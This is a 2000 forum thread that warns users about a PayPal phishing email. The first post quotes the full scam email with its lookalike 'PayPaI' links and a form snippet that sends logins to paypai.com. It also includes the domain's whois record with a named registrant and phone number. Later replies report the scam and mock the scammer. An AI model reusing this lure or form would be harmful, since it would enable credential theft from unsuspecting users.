PDA

View Full Version : paypal.com scam!



FunkmasterT
07-20-2000, 10:48 PM
This might be off topic, but since there isn't a "Deals that are scams" category, I thought it might be appropriate in here.

Anyway, watch out for bogus emails from paypal.com saying that "so-and-so" has just sent you money.

I got this off another board:

--------------

I just got the following message:

--------------
You've got cash!

Michael Swenson just sent you money with PayPal.

Amount: $827.46

Click here to get your new account bonus! http://www.PayPaI.com/bonus

Did you know you can earn money with the PayPal Refer-a-Friend
program? Go to http://www.Pay-Pal.com/specialoffers for more details.

To view your PayPal balance or other account information, log in at http://www.PayPaI.com/login

If you do not wish to be notified when someone sends you money, you
may edit your preferences by logging in to your PayPal account and
selecting the Profile subtab.

Thank you for using PayPal, a free service of X.com!
--------------

Notice that the link above is paypai.com not the correct one. Click on the links but DON'T LOGIN. It looks like some guys copied the paypal site and is collecting passwords...for what reason, I wonder??

Here's the code:

(FORM action=http://www.paypai.com/cgi-bin/webscr.cgi method=post name=login_form )(INPUT name=cmd type=hidden value=_login-submit)

It's routing Logins through the paypai.com server, BAD news. It probably just grabs the username and password boxes, saves them to a file, and passes the login info onto the REAL paypal servers. So in reality, it's logging you in, it's just passing the login info (username + password) through it's servers first, recording them, and passing them on to the paypal servers.

Be warned.


The whois info:

Registrant:
Birykov Inc.
Lenina 80
Chelyabinsk
South Ural
454000
RU

Domain Name: PAYPAI.COM

Administrative Contact, Billing Contact:
Mr Vasily I Birykov
Phone: 7-3512-128500
Fax: 7-3512-128500
Technical Contact, Zone Contact, Registrar:
Easyspace Hostmaster
Fax: +44 1932 350222

Record last updated on 2000-07-18.
Record created on 2000-07-18.

Domain servers in listed order:

NS1.EASYPOST.COM 216.167.71.20
NS3.EASYPOST.COM 216.167.71.24

-FMT

[This message has been edited by FunkmasterT (edited 07-20-2000).]

[This message has been edited by FunkmasterT (edited 07-20-2000).]

[This message has been edited by FunkmasterT (edited 07-20-2000).]

coocoomike
07-20-2000, 11:09 PM
man...what some people will do to get some money. stupid uralian? yeah...punk!

essm
07-20-2000, 11:11 PM
Hey Funk,

Thanks for the Heads up, this is the value of the internet. I did not get it and I hope the bastard can be shut down before he gets to many people

SanDiegoLocal
07-20-2000, 11:15 PM
Damn that sucks. I wonder if you can pass that info onto anyone to bust that mofo.

Pdizog
07-20-2000, 11:19 PM
This guy is pretty samrt...but he's gonna burn!!!

MadCool
07-20-2000, 11:24 PM
I just contacted PayPal about it.

------------------
Check out www.MadCool.com (http://www.MadCool.com) and www.RisingDragons.com (http://www.RisingDragons.com)

Hog
07-20-2000, 11:49 PM
I just contacted uniontribune, latimes, msnbc, and cnbc, I asked them to tell people not to fall into this trap!!

I also contacted PayPal.com and cancel my account, since they don't provide escort service, there is no real point to disclose your credit card info. on internet. I can pay by money order without payee's name on. It's the same as I use paypal.com, because they don't give a f*~k if somebody try to scam you. paypal states they are not responsible for that.

Hog

freenet
07-21-2000, 12:07 AM
Paypal and Xcom burned me! They got $2000+ of our families money and wont unfreeze the accounts!! be very careful of these guys, they are going to use all their resources ot try to track these crooks and if anything happesn with your account there is NO CUSTOMER SERVICE to speak of!

see: http://www.gotapex.com/ubb/Forum9/HTML/000495.html

McDuff
07-21-2000, 10:53 AM
For coverage: http://www.msnbc.com/news/435937.asp
For commentary http://slashdot.org/article.pl?sid=00/07/21/1343231&mode=thread

FYI, paypai.com website has been shut down.

FunkmasterT
07-21-2000, 11:12 AM
i hope the feds get'em good!

(if they have any jurisdiction over at all)

jclark
07-21-2000, 01:03 PM
Of course the obvious question is: do any escort services accept payment through paypal?

I'm just suprised noone has registered paypIace.com yet.

<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Hog:
I also contacted PayPal.com and cancel my account, since they don't provide escort service, there is no real point to disclose your credit card info. on internet.

Hog<HR></BLOCKQUOTE>

CuriousGeorge157
07-21-2000, 02:34 PM
I use pay pal all the time. Thanks for the warning!

Hydrox
07-21-2000, 05:00 PM
I'm really hoping that you were referring to paypal's lack of an escrow service and not actually an escort service. http://www.gotapex.com/ubb/smile.gif

jeepers
07-21-2000, 07:27 PM
This whole scam is/was genius. Pure genius.
Evil, but genius nonetheless.

------------------
JeEpErS!
www.moviefirst.com (http://www.moviefirst.com)
www.pricedsolow.com (http://www.pricedsolow.com)

bicycleKICK
07-21-2000, 11:24 PM
That's sick.

Godfather
07-22-2000, 04:30 AM
Great post...I'm sure this guy will get all that's coming to him...Hope he becomes somebody's b**ch in jail!


Godfather

ugly
07-22-2000, 06:06 AM
thanks for keeping us informed.

johnnymk
07-22-2000, 07:04 AM
Is Ural next to Uranus?